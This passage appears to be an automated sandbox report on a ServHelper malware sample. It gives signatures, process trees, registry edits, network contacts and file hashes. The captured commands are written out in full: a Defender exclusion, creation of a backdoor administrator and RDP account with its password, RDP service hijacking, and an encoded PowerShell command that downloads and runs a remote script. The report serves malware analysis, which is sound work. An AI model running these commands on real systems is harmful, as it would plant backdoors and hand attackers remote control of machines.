C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Mocenter\Moupdate.exe'
Network
Files
memory/1624-0-0x000000007492E000-0x000000007492F000-memory.dmp
memory/1624-1-0x0000000000260000-0x00000000004A4000-memory.dmp
memory/1624-2-0x0000000074920000-0x000000007500E000-memory.dmp
memory/1624-3-0x000000007492E000-0x000000007492F000-memory.dmp
memory/1624-4-0x0000000074920000-0x000000007500E000-memory.dmp
memory/1624-5-0x0000000007DF0000-0x0000000007FFC000-memory.dmp
memory/1624-6-0x0000000004430000-0x00000000044A0000-memory.dmp
memory/1624-70-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-68-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-66-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-64-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-62-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-60-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-58-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-56-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-54-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-52-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-50-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-48-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-46-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-44-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-42-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-40-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-38-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-36-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-34-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-32-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-30-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-28-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-26-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-24-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-22-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-20-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-18-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-16-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-14-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-12-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-10-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-8-0x0000000004430000-0x000000000449A000-memory.dmp
memory/1624-7-0x0000000004430000-0x000000000449A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_Ramerkpoygerkjyr.vbs
| MD5 | 4c3b08d7af0401a66aa7934a5f533276 |
| SHA1 | b5638475f3422d083a825a88a753db5e05666923 |
| SHA256 | 59f8fbd0ff79380d28c47847b14b846dd52ff36b00a08690c4cf5292b8dc5dc4 |
| SHA512 | 5497a31e5d47d2baa3bc43b6677fd8f35b55ed79e25bb831f5ee7c48c32e9aed9323a9b8d96dfc7ebe6ca3d3964f2d85ebaa2203a25b4b142ef2334542d87a0f |
memory/1624-2032-0x0000000074920000-0x000000007500E000-memory.dmp
Analysis: behavioral22
Detonation Overview
Submitted
2024-11-21 20:43
Reported
2024-11-21 20:46
Platform
win7-20241010-en
Max time kernel
130s
Max time network
128s
Command Line
Signatures
ServHelper
Servhelper family
Grants admin privileges
Remote Service Session Hijacking: RDP Hijacking
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net1.exe | N/A |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net1.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Indicator Removal: Network Share Connection Removal
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net1.exe | N/A |
Modifies RDP port number used by Windows
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
Server Software Component: Terminal Services DLL
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" | C:\Windows\system32\reg.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
Indicator Removal: File Deletion
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\rfxvmt.dll | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\branding\ShellBrd | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AMK2PH5L0YWHSRRA7LAO.temp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\branding\wupsvc.jpg | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\Basebrd | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\mediasrv.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\mediasvc.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\wupsvc.jpg | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\branding\mediasrv.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\branding\mediasvc.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Permission Groups Discovery: Local Groups
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 60ab5e21563cdb01 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\icacls.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2.exe
"C:\Users\Admin\AppData\Local\Temp\6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\c7ssiv2k.cmdline"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4E40.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC4E30.tmp"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
C:\Windows\system32\takeown.exe
"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
C:\Windows\system32\net.exe
net start rdpdr
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
C:\Windows\system32\cmd.exe
cmd /c net start TermService
C:\Windows\system32\net.exe
net start TermService
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 000000 /del
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 0V2Nxzqz /add
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 0V2Nxzqz /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 0V2Nxzqz /add
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" BCXRJFKE$ /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" BCXRJFKE$ /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" BCXRJFKE$ /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 0V2Nxzqz
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 0V2Nxzqz
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 0V2Nxzqz
C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
C:\Windows\System32\Wbem\WMIC.exe
wmic CPU get NAME
C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\system32\cmd.exe
cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | pgf5ga4g4b.cn | udp |
Files
memory/844-0-0x000007FEF55F3000-0x000007FEF55F4000-memory.dmp
memory/844-1-0x00000000414B0000-0x0000000041760000-memory.dmp
memory/844-2-0x000007FEF55F0000-0x000007FEF5FDC000-memory.dmp
memory/844-3-0x000007FEF55F0000-0x000007FEF5FDC000-memory.dmp
memory/844-4-0x000007FEF55F0000-0x000007FEF5FDC000-memory.dmp
memory/2804-12-0x000000001B210000-0x000000001B4F2000-memory.dmp
memory/2804-11-0x000007FEED6EE000-0x000007FEED6EF000-memory.dmp
memory/2804-13-0x00000000026A0000-0x00000000026A8000-memory.dmp
memory/2804-14-0x000007FEED430000-0x000007FEEDDCD000-memory.dmp
memory/2804-15-0x000007FEED430000-0x000007FEEDDCD000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ready.ps1
| MD5 | 3447df88de7128bdc34942334b2fab98 |
| SHA1 | 519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb |
| SHA256 | 9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9 |
| SHA512 | 2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f |
memory/2804-17-0x000007FEED430000-0x000007FEEDDCD000-memory.dmp
memory/2804-18-0x000007FEED430000-0x000007FEEDDCD000-memory.dmp
memory/2804-19-0x000007FEED430000-0x000007FEEDDCD000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\c7ssiv2k.cmdline
| MD5 | 475da53b18f6749ff83660c6049a136a |
| SHA1 | 944b6d8a68ae8bf1981b4388cbf8f510ed0359ef |
| SHA256 | 12a64c5a43332827581d129233165f5c77ccdeb21e8ef50edc0b2720ac7a778c |
| SHA512 | 1bd5dbfda5eee0e9998b1be2d1f87aa22ddbbf7366cf0e3e4d1d48a8278d7ad872fc006e5cbc3ed113f3a774c5b18db9cb189a6200f28aa6425f3a27a1ad1840 |
\??\c:\Users\Admin\AppData\Local\Temp\c7ssiv2k.0.cs
| MD5 | 4864fc038c0b4d61f508d402317c6e9a |
| SHA1 | 72171db3eea76ecff3f7f173b0de0d277b0fede7 |
| SHA256 | 0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84 |
| SHA512 | 9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31 |
\??\c:\Users\Admin\AppData\Local\Temp\CSC4E30.tmp
| MD5 | cace4db006569045bc845c0e9a33b2d1 |
| SHA1 | 788c725fbc5f4d6bdc526baee58da3a5e578195f |
| SHA256 | b735247538d7bd8b9c4fe2fedb0cacf92da9377463ddd0fca334d2c16201dde0 |
| SHA512 | 41125a539232988ad9556066cb47732ca7a3d98382ac68d2502530ff7e6bc8c09bb45013da9f3e2998c500602e02e7da26cb7ec957931ff2cf7f5a41317943de |
memory/2804-33-0x000000001B610000-0x000000001B618000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\c7ssiv2k.dll
| MD5 | 12551435e75d5c1fd4d052cc6c8e54e0 |
| SHA1 | f468601390a262023c7cac49cddb56f6a326a323 |
| SHA256 | 17db10f1effe51c5b60480a8807b3c1c34fb7109d3eeafdf1e98fc4e965fecaa |
| SHA512 | af976ec92276c4ba87b7c447c10910ecb9c97caf6ad3263c32f126e7b30e981b52df1ad3e59ed8f52acdb1404e89589e72bfe0c3230f4461b5fa0e611f419878 |
C:\Users\Admin\AppData\Local\Temp\RES4E40.tmp
| MD5 | 3844f38478c1fd655116149e52e0dc3d |
| SHA1 | 12f7a15c4c7e03bd91aa36e25fec7f2d7c2d9f30 |
| SHA256 | 10d0a5dd9d07ff4c49d69348cc66d5a85e30551dc9a144ad7676e43cdee6c70f |
| SHA512 | 6b97710887187a07a195ce813f2fba1c506dc2664e09a75e4e0c5d56a21555fa6a7362971db3ea7b70685ffca87677b1ddfbfd8cf5c2e64b7357beeee8c774c9 |
C:\Users\Admin\AppData\Local\Temp\c7ssiv2k.pdb
| MD5 | 33b826dac54184faa01b7091afe7ab5b |
| SHA1 | e635fc1ad68fb5cd4e3ff07c429fb2fda9407c59 |
| SHA256 | 64747faa11242331fab709cfd3acd53124b1c6e8d3eb9f87e229e051dc8eb8b5 |
| SHA512 | e384ab4b7d1a2e51f7c2a83e6d3a881b80bb345e5241e865a3b4bb99e0c91cc1a5bc913e15f950d6229cdc662c3b1dbf01db780eeca50f1843b21efbb95ce587 |
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1
| MD5 | 43473f4e719958639a9d89e5d8388999 |
| SHA1 | ccb79eb606a23daa4b3ff8f996a2fbf281f31491 |
| SHA256 | ce84b142a2983e1f60b3051cbff38153424a016178ce3fcf703e3694eb474734 |
| SHA512 | 1051092c5eae13758e8e01086907effc5c603cc1f9456fb2cdb951cb4b196c5c3d089ffd2e981b5d6731b0e6b24402fb2808a20f66ac6dcb1704a8f4b457b1fa |
memory/844-37-0x000007FEF55F3000-0x000007FEF55F4000-memory.dmp
memory/844-38-0x000007FEF55F0000-0x000007FEF5FDC000-memory.dmp
memory/2804-39-0x000000001D110000-0x000000001D142000-memory.dmp
memory/2804-40-0x000000001D110000-0x000000001D142000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 6e1f2b12419b44248556784b9d802c83 |
| SHA1 | bff3ca651dc3e197186319a0c125c01fb2a739df |
| SHA256 | 4dfed275a536cdb54a9f1790ec0357adcb8874cbbbf6a3bddf7514e88fb3cd6f |
| SHA512 | 27348063465ed084bd237ff7640692411c10c4d4d936b055e6db3d5119413fd0aa63a3aa55892d880125d3c2523f51e9b45ab4932c55cec723b8b168a4c4c36a |
memory/2804-51-0x000007FEED430000-0x000007FEEDDCD000-memory.dmp
memory/2804-52-0x000007FEED6EE000-0x000007FEED6EF000-memory.dmp
memory/2804-53-0x000007FEED430000-0x000007FEEDDCD000-memory.dmp
memory/2804-59-0x000007FEED430000-0x000007FEEDDCD000-memory.dmp
memory/2804-60-0x000007FEED430000-0x000007FEEDDCD000-memory.dmp
C:\Windows\system32\rfxvmt.dll
| MD5 | dc39d23e4c0e681fad7a3e1342a2843c |
